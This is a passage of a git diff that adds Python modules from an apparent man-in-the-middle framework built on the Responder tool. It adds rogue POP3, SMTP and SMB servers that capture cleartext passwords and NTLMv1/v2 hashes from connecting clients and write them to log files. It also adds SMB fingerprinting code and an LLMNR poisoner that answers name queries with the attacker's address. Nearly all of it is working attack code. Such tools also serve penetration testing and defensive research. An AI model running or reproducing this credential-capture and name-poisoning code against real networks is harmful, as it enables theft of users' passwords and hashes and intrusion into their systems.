TCPServer.server_bind(self) + + +class POPOKPacket(Packet): + fields = OrderedDict([ + ("Code", "+OK"), + ("CRLF", "\r\n"), + ]) + +#POP3 server class. +class POP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(POPOKPacket())) + data = self.request.recv(1024) + if data[0:4] == "USER": + User = data[5:].replace("\r\n","") + responder_logger.info('[+]POP3 User: %s'%(User)) + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + if data[0:4] == "PASS": + Pass = data[5:].replace("\r\n","") + Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,User+":"+Pass, User+":"+Pass) + #print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass) + responder_logger.info("[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass)) + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + else : + t = POPOKPacket() + self.request.send(str(t)) + data = self.request.recv(1024) + except Exception: + pass + +################################################################################## +#POP3 Stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/pop3/__init__.py b/core/protocols/pop3/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/smb/SMBPackets.py b/core/protocols/smb/SMBPackets.py new file mode 100644 index 0000000..a1d3fcb --- /dev/null +++ b/core/protocols/smb/SMBPackets.py @@ -0,0 +1,475 @@ +#! /usr/bin/env python +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +#Calculate total SMB packet len. +def longueur(payload): + length = struct.pack(">i", len(''.join(payload))) + return length + +#Set MID SMB Header field. +def midcalc(data): + pack=data[34:36] + return pack + +#Set UID SMB Header field. +def uidcalc(data): + pack=data[32:34] + return pack + +#Set PID SMB Header field. +def pidcalc(data): + pack=data[30:32] + return pack + +#Set TID SMB Header field. +def tidcalc(data): + pack=data[28:30] + return pack + + +################################################################################## +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("errorcode", "\x00\x00\x00\x00" ), + ("flag1", "\x00"), + ("flag2", "\x00\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\x00\x00"), + ("uid", "\x00\x00"), + ("mid", "\x00\x00"), + ]) +################################################################################## +#SMB Negotiate Answer LM packet. +class SMBNegoAnsLM(Packet): + fields = OrderedDict([ + ("Wordcount", "\x11"), + ("Dialect", ""), + ("Securitymode", "\x03"), + ("MaxMpx", "\x32\x00"), + ("MaxVc", "\x01\x00"), + ("Maxbuffsize", "\x04\x41\x00\x00"), + ("Maxrawbuff", "\x00\x00\x01\x00"), + ("Sessionkey", "\x00\x00\x00\x00"), + ("Capabilities", "\xfc\x3e\x01\x00"), + ("Systemtime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"), + ("Srvtimezone", "\x2c\x01"), + ("Keylength", "\x08"), + ("Bcc", "\x10\x00"), + ("Key", ""), + ("Domain", "SMB"), + ("DomainNull", "\x00\x00"), + ("Server", "SMB-TOOLKIT"), + ("ServerNull", "\x00\x00"), + ]) + + def calculate(self): + ##Convert first.. + self.fields["Domain"] = self.fields["Domain"].encode('utf-16le') + self.fields["Server"] = self.fields["Server"].encode('utf-16le') + ##Then calculate. + CompleteBCCLen = str(self.fields["Key"])+str(self.fields["Domain"])+str(self.fields["DomainNull"])+str(self.fields["Server"])+str(self.fields["ServerNull"]) + self.fields["Bcc"] = struct.pack("B", len(AsnLen+CalculateSecBlob)-3) + self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-6) + self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"]))) + self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"]))) + self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"]))) + self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob)) + + ###### Andxoffset calculation. + CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Action"])+str(self.fields["SecBlobLen"])+str(self.fields["Bcc"])+BccLen + + self.fields["Andxoffset"] = struct.pack(" 260: + SSPIStart = data[79:] + LMhashLen = struct.unpack(' 260: + SSPIStart = data[79:] + LMhashLen = struct.unpack(' 60: + outfile = "./logs/responder/SMB-NTLMv2-Client-"+client+".txt" + NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() + DomainLen = struct.unpack(' 25: + Hash = data[65+LMhashLen:65+LMhashLen+NthashLen] + responder_logger.info('[+]SMB-NTLMv2 hash captured from :%s'%(client)) + outfile = "./logs/responder/SMB-NTLMv2-Client-"+client+".txt" + pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] + var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] + Username, Domain = tuple(var) + Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper() + ParseShare(data) + WriteData(outfile,Writehash, Username+"::"+Domain) + responder_logger.info('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash)) + if NthashLen == 24: + responder_logger.info('[+]SMB-NTLMv1 hash captured from :%s'%(client)) + outfile = "./logs/responder/SMB-NTLMv1-Client-"+client+".txt" + pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] + var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] + Username, Domain = tuple(var) + writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal + ParseShare(data) + WriteData(outfile,writehash, Username+"::"+Domain) + responder_logger.info('[+]SMB-NTLMv1 complete hash is :%s'%(writehash)) + responder_logger.info('[+]SMB-NTLMv1 Username:%s'%(Username)) + responder_logger.info('[+]SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain)) + except Exception: + raise + +def IsNT4ClearTxt(data): + HeadLen = 36 + Flag2 = data[14:16] + if Flag2 == "\x03\x80": + SmbData = data[HeadLen+14:] + WordCount = data[HeadLen] + ChainedCmdOffset = data[HeadLen+1] + if ChainedCmdOffset == "\x75": + PassLen = struct.unpack(' 2: + Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","") + User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","") + #print "[SMB]Clear Text Credentials: %s:%s" %(User,Password) + responder_logger.info("[SMB]Clear Text Credentials: %s:%s"%(User,Password)) + +#SMB Server class, NTLMSSP +class SMB1(BaseRequestHandler): + + def handle(self): + try: + while True: + data = self.request.recv(1024) + self.request.settimeout(1) + ##session request 139 + if data[0] == "\x81": + buffer0 = "\x82\x00\x00\x00" + self.request.send(buffer0) + data = self.request.recv(1024) + ##Negotiate proto answer. + if data[8:10] == "\x72\x00": + #Customize SMB answer. + head = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data)) + t = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data)) + t.calculate() + final = t + packet0 = str(head)+str(final) + buffer0 = longueur(packet0)+packet0 + self.request.send(buffer0) + data = self.request.recv(1024) + ##Session Setup AndX Request + if data[8:10] == "\x73\x00": + IsNT4ClearTxt(data) + head = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data)) + t = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge) + t.calculate() + final = t + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(4096) + if data[8:10] == "\x73\x00": + if Is_Anonymous(data): + head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. + final = SMBSessEmpty() + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + else: + ParseSMBHash(data,self.client_address[0]) + head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + final = SMBSession2Accept() + final.calculate() + packet2 = str(head)+str(final) + buffer2 = longueur(packet2)+packet2 + self.request.send(buffer2) + data = self.request.recv(1024) + ##Tree Connect IPC Answer + if data[8:10] == "\x75\x00": + ParseShare(data) + head = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data)) + t = SMBTreeData() + t.calculate() + final = t + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + ##Tree Disconnect. + if data[8:10] == "\x71\x00": + head = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + final = "\x00\x00\x00" + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + ##NT_CREATE Access Denied. + if data[8:10] == "\xa2\x00": + head = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + final = "\x00\x00\x00" + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + ##Trans2 Access Denied. + if data[8:10] == "\x25\x00": + head = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + final = "\x00\x00\x00" + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + ##LogOff. + if data[8:10] == "\x74\x00": + head = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + final = "\x02\xff\x00\x27\x00\x00\x00" + packet1 = str(head)+str(final) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + + except Exception: + pass #no need to print errors.. + +#SMB Server class, old version. +class SMB1LM(BaseRequestHandler): + + def handle(self): + try: + self.request.settimeout(0.5) + data = self.request.recv(1024) + ##session request 139 + if data[0] == "\x81": + buffer0 = "\x82\x00\x00\x00" + self.request.send(buffer0) + data = self.request.recv(1024) + ##Negotiate proto answer. + if data[8:10] == "\x72\x00": + head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data)) + t = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=Challenge) + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + ##Session Setup AndX Request + if data[8:10] == "\x73\x00": + if Is_LMNT_Anonymous(data): + head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + packet1 = str(head)+str(SMBSessEmpty()) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + else: + ParseLMNTHash(data,self.client_address[0]) + head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) + packet1 = str(head)+str(SMBSessEmpty()) + buffer1 = longueur(packet1)+packet1 + self.request.send(buffer1) + data = self.request.recv(1024) + + except Exception: + self.request.close() + pass + +################################################################################## +#SMB Server stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/smb/SMBserver.py b/core/protocols/smb/SMBserver.py new file mode 100644 index 0000000..7922382 --- /dev/null +++ b/core/protocols/smb/SMBserver.py @@ -0,0 +1,28 @@ +import logging +import threading +import sys +from impacket import smbserver, LOG + +LOG.setLevel(logging.INFO) +LOG.propagate = False +#logging.getLogger('smbserver').setLevel(logging.INFO) +#logging.getLogger('impacket').setLevel(logging.INFO) + +formatter = logging.Formatter("%(asctime)s [SMBserver] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") +fileHandler = logging.FileHandler("./logs/mitmf.log") +streamHandler = logging.StreamHandler(sys.stdout) +fileHandler.setFormatter(formatter) +streamHandler.setFormatter(formatter) +LOG.addHandler(fileHandler) +LOG.addHandler(streamHandler) + +class SMBserver: + + def __init__(self, listenAddress = '0.0.0.0', listenPort=445, configFile=''): + + self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile) + + def start(self): + t = threading.Thread(name='SMBserver', target=self.server.start) + t.setDaemon(True) + t.start() \ No newline at end of file diff --git a/core/protocols/smb/__init__.py b/core/protocols/smb/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/smtp/SMTPPackets.py b/core/protocols/smtp/SMTPPackets.py new file mode 100644 index 0000000..65e252c --- /dev/null +++ b/core/protocols/smtp/SMTPPackets.py @@ -0,0 +1,74 @@ +#! /usr/bin/env python +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +#SMTP Greating class +class SMTPGreating(Packet): + fields = OrderedDict([ + ("Code", "220"), + ("Separator", "\x20"), + ("Message", "smtp01.local ESMTP"), + ("CRLF", "\x0d\x0a"), + ]) + +class SMTPAUTH(Packet): + fields = OrderedDict([ + ("Code0", "250"), + ("Separator0", "\x2d"), + ("Message0", "smtp01.local"), + ("CRLF0", "\x0d\x0a"), + ("Code", "250"), + ("Separator", "\x20"), + ("Message", "AUTH LOGIN PLAIN XYMCOOKIE"), + ("CRLF", "\x0d\x0a"), + ]) + +class SMTPAUTH1(Packet): + fields = OrderedDict([ + ("Code", "334"), + ("Separator", "\x20"), + ("Message", "VXNlcm5hbWU6"),#Username + ("CRLF", "\x0d\x0a"), + + ]) + +class SMTPAUTH2(Packet): + fields = OrderedDict([ + ("Code", "334"), + ("Separator", "\x20"), + ("Message", "UGFzc3dvcmQ6"),#Password + ("CRLF", "\x0d\x0a"), + + ]) + + diff --git a/core/protocols/smtp/SMTPServer.py b/core/protocols/smtp/SMTPServer.py new file mode 100644 index 0000000..50002f9 --- /dev/null +++ b/core/protocols/smtp/SMTPServer.py @@ -0,0 +1,63 @@ +################################################################################## +#ESMTP Stuff starts here +################################################################################## + +class SMTP(): + + def serve_thread_tcp(self, host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(self, SMTP_On_Off): + if SMTP_On_Off == "ON": + t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=("0.0.0.0", 25,ESMTP)) + t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=("0.0.0.0", 587,ESMTP)) + + for t in [t1, t2]: + t.setDaemon(True) + t.start() + + if SMTP_On_Off == "OFF": + return False + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +#ESMTP server class. +class ESMTP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(SMTPGreating())) + data = self.request.recv(1024) + if data[0:4] == "EHLO": + self.request.send(str(SMTPAUTH())) + data = self.request.recv(1024) + if data[0:4] == "AUTH": + self.request.send(str(SMTPAUTH1())) + data = self.request.recv(1024) + if data: + Username = b64decode(data[:len(data)-2]) + self.request.send(str(SMTPAUTH2())) + data = self.request.recv(1024) + if data: + Password = b64decode(data[:len(data)-2]) + Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,Username+":"+Password, Username+":"+Password) + #print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password) + responder_logger.info("[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)) + + except Exception: + pass + +################################################################################## +#ESMTP Stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/smtp/__init__.py b/core/protocols/smtp/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/responder/__init__.py b/core/responder/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/responder/common.py b/core/responder/common.py new file mode 100644 index 0000000..cd0ea40 --- /dev/null +++ b/core/responder/common.py @@ -0,0 +1,102 @@ +#common functions that are used throughout the Responder's code + + +import re + +#Function used to write captured hashs to a file. +def WriteData(outfile, data, user): + if os.path.isfile(outfile) == False: + with open(outfile,"w") as outf: + outf.write(data) + outf.write("\n") + outf.close() + if os.path.isfile(outfile) == True: + with open(outfile,"r") as filestr: + if re.search(user.encode('hex'), filestr.read().encode('hex')): + filestr.close() + return False + if re.search(re.escape("$"), user): + filestr.close() + return False + else: + with open(outfile,"a") as outf2: + outf2.write(data) + outf2.write("\n") + outf2.close() + +def Parse_IPV6_Addr(data): + if data[len(data)-4:len(data)][1] =="\x1c": + return False + if data[len(data)-4:len(data)] == "\x00\x01\x00\x01": + return True + if data[len(data)-4:len(data)] == "\x00\xff\x00\x01": + return True + else: + return False + +#Function name self-explanatory +def Is_Finger_On(Finger_On_Off): + if Finger_On_Off == True: + return True + if Finger_On_Off == False: + return False + +def RespondToSpecificHost(RespondTo): + if len(RespondTo)>=1 and RespondTo != ['']: + return True + else: + return False + +def RespondToSpecificName(RespondToName): + if len(RespondToName)>=1 and RespondToName != ['']: + return True + else: + return False + +def RespondToIPScope(RespondTo, ClientIp): + if ClientIp in RespondTo: + return True + else: + return False + +def RespondToNameScope(RespondToName, Name): + if Name in RespondToName: + return True + else: + return False + +##Dont Respond to these hosts/names. +def DontRespondToSpecificHost(DontRespondTo): + if len(DontRespondTo)>=1 and DontRespondTo != ['']: + return True + else: + return False + +def DontRespondToSpecificName(DontRespondToName): + if len(DontRespondToName)>=1 and DontRespondToName != ['']: + return True + else: + return False + +def DontRespondToIPScope(DontRespondTo, ClientIp): + if ClientIp in DontRespondTo: + return True + else: + return False + +def DontRespondToNameScope(DontRespondToName, Name): + if Name in DontRespondToName: + return True + else: + return False + +def IsOnTheSameSubnet(ip, net): + net = net+'/24' + ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16) + netstr, bits = net.split('/') + netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16) + mask = (0xffffffff << (32 - int(bits))) & 0xffffffff + return (ipaddr & mask) == (netaddr & mask) + +def FindLocalIP(Iface): + return OURIP \ No newline at end of file diff --git a/core/responder/fingerprinter/Fingerprint.py b/core/responder/fingerprinter/Fingerprint.py new file mode 100644 index 0000000..8eda227 --- /dev/null +++ b/core/responder/fingerprinter/Fingerprint.py @@ -0,0 +1,121 @@ +#! /usr/bin/env python +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +import re,sys,socket,struct,string +from socket import * +from ..odict import OrderedDict +from ..packet import Packet + +def longueur(payload): + length = struct.pack(">i", len(''.join(payload))) + return length + +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("error-code", "\x00\x00\x00\x00" ), + ("flag1", "\x00"), + ("flag2", "\x00\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\x00\x00"), + ("uid", "\x00\x00"), + ("mid", "\x00\x00"), + ]) + +class SMBNego(Packet): + fields = OrderedDict([ + ("wordcount", "\x00"), + ("bcc", "\x62\x00"), + ("data", "") + ]) + + def calculate(self): + self.fields["bcc"] = struct.pack(". +import re,socket,struct +from socket import * +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + +def longueur(payload): + length = struct.pack(">i", len(''.join(payload))) + return length + +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("error-code", "\x00\x00\x00\x00" ), + ("flag1", "\x00"), + ("flag2", "\x00\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\x00\x00"), + ("uid", "\x00\x00"), + ("mid", "\x00\x00"), + ]) + +class SMBNego(Packet): + fields = OrderedDict([ + ("wordcount", "\x00"), + ("bcc", "\x62\x00"), + ("data", "") + ]) + + def calculate(self): + self.fields["bcc"] = struct.pack("i", len(''.join(payload))) + return length + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) + + +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("error-code", "\x00\x00\x00\x00" ), + ("flag1", "\x08"), + ("flag2", "\x01\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\x3c\x1b"), + ("uid", "\x00\x00"), + ("mid", "\x00\x00"), + ]) + +class SMBNegoData(Packet): + fields = OrderedDict([ + ("wordcount", "\x00"), + ("bcc", "\x54\x00"), + ("separator1","\x02" ), + ("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"), + ("separator2","\x02"), + ("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"), + ]) + def calculate(self): + CalculateBCC = str(self.fields["separator1"])+str(self.fields["dialect1"])+str(self.fields["separator2"])+str(self.fields["dialect2"]) + self.fields["bcc"] = struct.pack(". +import struct +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) +################################################################################## +#SMB Client Stuff +################################################################################## + +def longueur(payload): + length = struct.pack(">i", len(''.join(payload))) + return length + +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("error-code", "\x00\x00\x00\x00" ), + ("flag1", "\x00"), + ("flag2", "\x00\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\x00\x4e"), + ("uid", "\x00\x08"), + ("mid", "\x00\x00"), + ]) + +class SMBNego(Packet): + fields = OrderedDict([ + ("Wordcount", "\x00"), + ("Bcc", "\x62\x00"), + ("Data", "") + ]) + + def calculate(self): + self.fields["Bcc"] = struct.pack("i", len(''.join(payload))) + return length + +#Set MID SMB Header field. +def midcalc(data): + pack=data[34:36] + return pack + +#Set UID SMB Header field. +def uidcalc(data): + pack=data[32:34] + return pack + +#Set PID SMB Header field. +def pidcalc(data): + pack=data[30:32] + return pack + +#Set TID SMB Header field. +def tidcalc(data): + pack=data[28:30] + return pack + +#SMB Header answer packet. +class SMBHeader(Packet): + fields = OrderedDict([ + ("proto", "\xff\x53\x4d\x42"), + ("cmd", "\x72"), + ("errorcode", "\x00\x00\x00\x00" ), + ("flag1", "\x80"), + ("flag2", "\x00\x00"), + ("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\xff\xfe"), + ("uid", "\x00\x00"), + ("mid", "\x00\x00"), + ]) + +#SMB Negotiate Answer packet. +class SMBNegoAns(Packet): + fields = OrderedDict([ + ("Wordcount", "\x11"), + ("Dialect", ""), + ("Securitymode", "\x03"), + ("MaxMpx", "\x32\x00"), + ("MaxVc", "\x01\x00"), + ("Maxbuffsize", "\x04\x11\x00\x00"), + ("Maxrawbuff", "\x00\x00\x01\x00"), + ("Sessionkey", "\x00\x00\x00\x00"), + ("Capabilities", "\xfd\x43\x00\x00"), + ("Systemtime", "\xc2\x74\xf2\x53\x70\x02\xcf\x01\x2c\x01"), + ("Keylength", "\x08"), + ("Bcc", "\x10\x00"), + ("Key", "\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d"), + ("Domain", ""), + + ]) + + def calculate(self): + + ##Then calculate. + CompleteBCCLen = str(self.fields["Key"])+str(self.fields["Domain"]) + self.fields["Bcc"] = struct.pack(" {}".format(OURIP)) + server = ThreadingUDPLLMNRServer(("0.0.0.0", 5355), LLMNR) + t = threading.Thread(name="LLMNR", target=server.serve_forever) #LLMNR + t.setDaemon(True) + t.start() + except Exception, e: + mitmf_logger.error("[LLMNRPoisoner] Error starting on port {}: {}:".format(5355, e)) + +class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer): + + allow_reuse_address = 1 + + def server_bind(self): + MADDR = "224.0.0.252" + self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) + self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) + Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + socket.inet_aton(OURIP)) + + UDPServer.server_bind(self) + +#LLMNR Answer packet. +class LLMNRAns(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x80\x00"), + ("Question", "\x00\x01"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("QuestionNameLen", "\x09"), + ("QuestionName", ""), + ("QuestionNameNull", "\x00"), + ("Type", "\x00\x01"), + ("Class", "\x00\x01"), + ("AnswerNameLen", "\x09"), + ("AnswerName", ""), + ("AnswerNameNull", "\x00"), + ("Type1", "\x00\x01"), + ("Class1", "\x00\x01"), + ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec. + ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ]) + + 